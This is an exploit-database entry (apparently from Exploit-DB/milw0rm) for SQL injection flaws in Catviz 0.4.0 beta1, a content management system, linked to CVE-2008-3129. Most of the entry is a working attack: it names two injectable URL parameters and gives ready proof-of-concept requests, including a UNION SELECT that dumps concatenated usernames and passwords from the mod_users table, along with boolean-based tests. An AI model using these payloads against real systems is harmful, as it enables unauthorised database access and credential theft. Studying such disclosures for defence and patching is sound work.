Lucene search
AnonymousEDB-ID:5974HistoryJun 30, 2008 - 12:00 a.m.
Catviz 0.4.0 beta1 - Multiple SQL Injections
2008-06-3000:00:00
anonymous
www.exploit-db.com
23
AI Score
7.4
Confidence
Low
######################
#
#Catviz 0.4.0 beta1 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: n/a
#
#Homepage: catviz.sourceforge.net
#
##
###
##
#
#This CMS suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL]
#http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]
#
#PoC:
#index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
#
#
#You get "Go away you nasty intruder wannabe." when you do a wrong login...
#
#
#######################
#
#Greetz to thund3r, b!zZ!t, haZl0oh, WhiTΓ’βΒ¬ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free-Hack and Sys-Flaw and h4ck-y0u.
#
#
#######################
#######################
# milw0rm.com [2008-06-30]Related
prion
prion
Sql injection
2008-07-10 23:41:00
nvd
nvd
CVE-2008-3129
2008-07-10 23:41:00
cvelist
cvelist
CVE-2008-3129
2008-07-10 23:00:00
cve
cve
CVE-2008-3129
2008-07-10 23:41:00